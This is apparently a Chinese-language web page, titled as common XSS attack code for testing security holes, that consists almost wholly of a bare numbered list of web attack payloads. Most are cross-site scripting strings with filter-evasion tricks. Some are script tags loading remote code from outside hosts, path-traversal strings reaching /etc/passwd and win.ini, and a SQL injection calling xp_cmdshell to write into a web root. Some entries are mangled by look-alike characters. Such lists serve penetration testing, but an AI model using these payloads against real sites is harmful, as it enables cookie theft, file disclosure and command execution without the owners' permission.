常用的xss攻击代码，便于测试系统安全漏洞

常用的xss攻击代码，便于测试系统安全漏洞

1. 1'"()&%<acx><ScRiPt >prompt(915149)</ScRiPt>
   
2. 
   
3. <svg/οnlοad=alert(1)>
   
4. 
   
5. <script>alert(document.cookie)</script>
   
6. 
   
7. '><script>alert(document.cookie)</script>
   
8. 
   
9. ='><script>alert(document.cookie)</script>
   
10. 
    
11. <script>alert(vulnerable)</script>
    
12. 
    
13. %3Cscript%3Ealert('XSS')%3C/script%3E
    
14. 
    
15. <script>alert('XSS')</script>
    
16. 
    
17. <img src="javascript:alert('XSS')">
    
18. 
    
19. %0a%0a<script>alert("Vulnerable")</script>.jsp
    
20. 
    
21. %22%3cscript%3ealert(%22xss%22)%3c/script%3e
    
22. 
    
23. %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
    
24. 
    
25. %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
    
26. 
    
27. %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    
28. 
    
29. %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
    
30. 
    
31. %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
    
32. 
    
33. <script>alert('Vulnerable');</script>
    
34. 
    
35. <script>alert('Vulnerable')</script>
    
36. 
    
37. a.jsp/<script>alert('Vulnerable')</script>
    
38. 
    
39. a?<script>alert('Vulnerable')</script>
    
40. 
    
41. "><script>alert('Vulnerable')</script>
    
42. 
    
43. ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
    
44. 
    
45. %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    
46. 
    
47. %3Cscript%3Ealert(document. domain);%3C/script%3E&
    
48. 
    
49. %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
    
50. 
    
51. <IMG src="javascript:alert('XSS');">
    
52. 
    
53. <IMG src=javascript:alert('XSS')>
    
54. 
    
55. <IMG src=JaVaScRiPt:alert('XSS')>
    
56. 
    
57. <IMG src=JaVaScRiPt:alert("XSS")>
    
58. 
    
59. <IMG src=javascript:alert('XSS')>
    
60. 
    
61. <IMG src=javascript:alert('XSS')>
    
62. 
    
63. <IMG src=javascript:alert('XSS')>
    
64. 
    
65. <IMG src="jav ascript:alert('XSS');">
    
66. 
    
67. <IMG src="jav ascript:alert('XSS');">
    
68. 
    
69. <IMG src="jav ascript:alert('XSS');">
    
70. 
    
71. "<IMG src=java\0script:alert("XSS")>";' > out
    
72. 
    
73. <IMG src=" javascript:alert('XSS');">
    
74. 
    
75. <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
    
76. 
    
77. <BODY BACKGROUND="javascript:alert('XSS')">
    
78. 
    
79. <BODY ONLOAD=alert('XSS')>
    
80. 
    
81. <IMG DYNSRC="javascript:alert('XSS')">
    
82. 
    
83. <IMG LOWSRC="javascript:alert('XSS')">
    
84. 
    
85. <BGSOUND src="javascript:alert('XSS');">
    
86. 
    
87. <br size="&{alert('XSS')}">
    
88. 
    
89. <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
    
90. 
    
91. <LINK REL="stylesheet" href="javascript:alert('XSS');">
    
92. 
    
93. <IMG src='vbscript:msgbox("XSS")'>
    
94. 
    
95. <IMG src="mocha:[code]">
    
96. 
    
97. <IMG src="livescript:[code]">
    
98. 
    
99. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
    
100. 
     
101. <IFRAME src=javascript:alert('XSS')></IFRAME>
     
102. 
     
103. <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
     
104. 
     
105. <TABLE BACKGROUND="javascript:alert('XSS')">
     
106. 
     
107. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
     
108. 
     
109. <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
     
110. 
     
111. <DIV STYLE="width: expression(alert('XSS'));">
     
112. 
     
113. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
     
114. 
     
115. <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
     
116. 
     
117. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
     
118. 
     
119. <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
     
120. 
     
121. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
122. 
     
123. <BASE href="javascript:alert('XSS');//">
     
124. 
     
125. getURL("javascript:alert('XSS')")
     
126. 
     
127. a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
     
128. 
     
129. <XML src="javascript:alert('XSS');">
     
130. 
     
131. "> <BODY><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
     
132. 
     
133. <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
     
134. 
     
135. <IMG src="javascript:alert('XSS')"
     
136. 
     
137. <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
     
138. '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
     
139. 
     
140. <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
     
141. 
     
142. <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
143. 
     
144. <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
145. 
     
146. <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
147. 
     
148. <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
149. 
     
150. <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
     
151. 
     
152. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
     
153. 
     
154. <IMG SRC=javascript:alert(‘XSS’)>
     
155. 
     
156. <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”>
     
157. 
     
158. <IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img>
     
159. 
     
160. <img src=x οnerrοr=”javascript:alert('XSS')″>
     
161. 
     
162. <IMG SRC=javascript:alert(
     
163. 
     
164. 'XSS')>
     
165. 
     
166. <IMG SRC=javascript:alert('XSS')>
     
167. 
     
168. <IMG SRC=”jav ascript:alert(‘XSS’);”>
     
169. 
     
170. <IMG SRC=”jav
     
171. ascript:alert(‘XSS’);”>
     
172. 
     
173. <IMG SRC=”   javascript:alert(‘XSS’);”>
     
174. 
     
175. <<SCRIPT>alert(“XSS”);//<</SCRIPT>
     
176. 
     
177. <IMG SRC=”javascript:alert(‘XSS’)”
     
178. 
     
179. </script><script>alert(‘XSS’);</script>
     
180. 
     
181. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
     
182. 
     
183. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
     
184. 
     
185. <svg/οnlοad=alert('XSS')>
     
186. 
     
187. <IMG SRC=’vbscript:msgbox(“XSS”)’>
     
188. 
     
189. <BGSOUND SRC="javascript:alert('XSS');">
     
190. 
     
191. <BR SIZE="&{alert('XSS')}">
     
192. 
     
193. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
     
194. 
     
195. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
     
196. 
     
197. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
     
198. 
     
199. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
     
200. 
     
201. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
     
202. 
     
203. <XSS STYLE="behavior: url(xss.htc);">
     
204. 
     
205. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
     
206. 
     
207. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
     
208. 
     
209. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
     
210. 
     
211. <DIV STYLE="width: expression(alert('XSS'));">
     
212. 
     
213. <SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

复制代码